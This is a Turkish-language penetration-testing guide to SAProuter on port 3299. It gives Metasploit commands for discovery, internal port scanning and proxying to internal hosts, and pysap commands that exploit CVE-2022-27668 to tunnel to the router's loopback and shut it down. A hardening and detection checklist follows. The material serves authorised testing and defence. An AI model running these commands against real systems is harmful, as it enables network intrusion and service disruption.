# 3299/tcp - Pentesting SAProuter

Reading time: 6 minutes

PORT     STATE SERVICE    VERSION
3299/tcp open  saprouter?

Bu, https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/ adresindeki gönderinin bir özetidir.

Metasploit ile SAProuter Penetrasyonu Anlama

SAProuter, SAP sistemleri için bir ters proxy olarak işlev görür ve esasen internet ile dahili SAP ağları arasındaki erişimi kontrol etmek için kullanılır. Genellikle, TCP port 3299'un kurumsal güvenlik duvarları aracılığıyla internete açılmasıyla internete maruz kalır. Bu yapı, SAProuter'ı penetrasyon testi için cazip bir hedef haline getirir çünkü yüksek değerli dahili ağlara bir kapı görevi görebilir.

Tarama ve Bilgi Toplama

Başlangıçta, belirli bir IP adresinde bir SAP yönlendiricisinin çalışıp çalışmadığını belirlemek için sap_service_discovery modülü kullanılarak bir tarama gerçekleştirilir. Bu adım, bir SAP yönlendiricisinin varlığını ve açık portunu belirlemek için kritik öneme sahiptir.

msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run

Keşif sonrasında, sap_router_info_request modülü ile SAP yönlendiricisinin yapılandırması üzerinde daha fazla araştırma yapılır ve bu, potansiyel olarak iç ağ detaylarını ortaya çıkarabilir.

msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run

İç Hizmetlerin Sayımı

Elde edilen iç ağ bilgileriyle, sap_router_portscanner modülü, SAProuter üzerinden iç hostları ve hizmetleri sorgulamak için kullanılır ve bu da iç ağlar ve hizmet yapılandırmaları hakkında daha derin bir anlayış sağlar.

msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN

Bu modülün belirli SAP örneklerine ve portlara hedefleme esnekliği, detaylı iç ağ keşfi için etkili bir araç olmasını sağlar.

Gelişmiş Sayım ve ACL Haritalama

Daha fazla tarama, SAProuter üzerindeki Erişim Kontrol Listelerinin (ACL) nasıl yapılandırıldığını, hangi bağlantıların izin verildiğini veya engellendiğini ortaya çıkarabilir. Bu bilgi, güvenlik politikalarını ve potansiyel zayıflıkları anlamada kritik öneme sahiptir.

msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN

İç Hostların Kayıt Dışı Sayımı

SAProuter'dan doğrudan bilgi alımının sınırlı olduğu senaryolarda, kayıt dışı sayım gibi teknikler uygulanabilir. Bu yaklaşım, iç host adlarının varlığını tahmin etmeye ve doğrulamaya çalışarak, doğrudan IP adresleri olmadan potansiyel hedefleri ortaya çıkarır.

Sızma Testi İçin Bilgilerin Kullanılması

Ağı haritaladıktan ve erişilebilir hizmetleri belirledikten sonra, sızma test uzmanları Metasploit'in proxy yeteneklerini kullanarak SAProuter üzerinden iç SAP hizmetlerinin daha fazla keşfi ve istismarı için geçiş yapabilirler.

msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
msf auxiliary(sap_hostctrl_getcomputersystem) > run

Sonuç

Bu yaklaşım, güvenli SAProuter yapılandırmalarının önemini vurgulamakta ve hedefli pentesting ile iç ağlara erişim sağlama potansiyelini ortaya koymaktadır. SAP yönlendiricilerini düzgün bir şekilde güvence altına almak ve ağ güvenliği mimarisindeki rollerini anlamak, yetkisiz erişime karşı korunmak için kritik öneme sahiptir.

Metasploit modülleri ve bunların kullanımı hakkında daha ayrıntılı bilgi için Rapid7'nin veritabanını ziyaret edin.

Son Güvenlik Açıkları (2022-2025)

CVE-2022-27668 – Yanlış Erişim Kontrolü ➜ Uzaktan Yönetim Komutu İcraatı

Haziran 2022'de SAP, SAProuter'daki (tüm çekirdekler ≥ 7.22) kritik bir açığı (CVSS 9.8) ele alan Güvenlik Notu 3158375 yayınladı. Kimlik doğrulaması yapılmamış bir saldırgan, -X uzaktan yönetim seçeneği olmadan başlatılmış olsa bile, uzaktaki bir hosttan yönetim paketleri (örneğin shutdown, trace-level, connection-kill) göndermek için izin verici saprouttab girişlerini kötüye kullanabilir.

Sorun, belirtilmemiş adres 0.0.0.0 hedef alınarak yönlendiricinin kendi döngü arayüzüne bir tünel oluşturma olasılığından kaynaklanmaktadır. Tünel kurulduğunda, saldırgan yerel host ayrıcalıklarına sahip olur ve herhangi bir yönetim komutunu çalıştırabilir.

Pratik istismar, pysap çerçevesi ile yeniden üretilebilir:

# 1. Build a loopback tunnel through the vulnerable SAProuter
python router_portfw.py -d <ROUTER_IP> -p 3299 \
-t 0.0.0.0    -r 3299 \
-a 127.0.0.1  -l 3299 -v

# 2. Send an admin packet (here: stop the remote router)
python router_admin.py -s -d 127.0.0.1 -p 3299

Etkilenen sürümler

• Bağımsız SAProuter 7.22 / 7.53
• Kernel 7.49, 7.77, 7.81, 7.85–7.88 (dahil KRNL64NUC/UC)

Düzeltme / Hafifletme

1. SAP Notu 3158375 ile sağlanan yamanın uygulanması.
2. saprouttab içindeki P ve S satırlarından joker karakter (*) hedeflerinin kaldırılması.
3. Yönlendiricinin -X seçeneği olmadan başlatıldığından ve doğrudan İnternete maruz kalmadığından emin olunması.

Güncellenmiş Araçlar & Hileler

• pysap – aktif olarak bakımda ve özel NI/Yönlendirici paketleri oluşturmak, ACL'leri fuzzlamak veya CVE-2022-27668 istismarını otomatikleştirmek için router_portfw.py, router_admin.py & router_trace.py sağlar.
• Nmap – özel SAProuter probunu ekleyerek hizmet tespitini genişletin:

Probe TCP SAProuter q|\x00\x00\x00\x00|
ports 3299
match saprouter m|SAProuter ([\d.]+)| p/SAProuter/ v/$1/

NSE betikleri veya --script=banner ile birleştirerek banner dizesini (SAProuter <ver> on '<host>') sızdıran sürümleri hızlı bir şekilde parmak izi çıkarın.

• Metasploit – yukarıda gösterilen yardımcı modüller, pysap ile oluşturulan bir SOCKS veya NI proxy üzerinden çalışmaya devam eder, bu da yönlendirici doğrudan erişimi engellese bile tam çerçeve entegrasyonu sağlar.

Güçlendirme & Tespit Kontrol Listesi

• Perimeter güvenlik duvarında 3299/TCP portunu filtreleyin – yalnızca güvenilir SAP destek ağlarından gelen trafiğe izin verin.
• SAProuter'ı tamamen yamalı tutun; saprouter -v ile doğrulayın ve en son kernel yamanın seviyesine karşı karşılaştırın.
• saprouttab içinde katı, host-spesifik girişler kullanın; * joker karakterlerden kaçının ve rastgele host veya portları hedefleyen P/S kurallarını reddedin.
• Servisi -S <secudir> + SNC ile başlatın, böylece şifreleme ve karşılıklı kimlik doğrulama zorunlu hale gelir.
• Uzaktan yönetimi devre dışı bırakın (-X) ve mümkünse dinleyiciyi 127.0.0.1'e bağlayın, gerekli trafik için harici bir ters proxy kullanın.
• Şüpheli ROUTER_ADM paketleri veya 0.0.0.0'a beklenmedik NI_ROUTE istekleri için dev_rout günlüğünü izleyin.

Referanslar

• https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
• https://sec-consult.com/vulnerability-lab/advisory/improper-access-control-in-sap-saprouter/

Shodan

• port:3299 !HTTP Ağ paketi çok büyük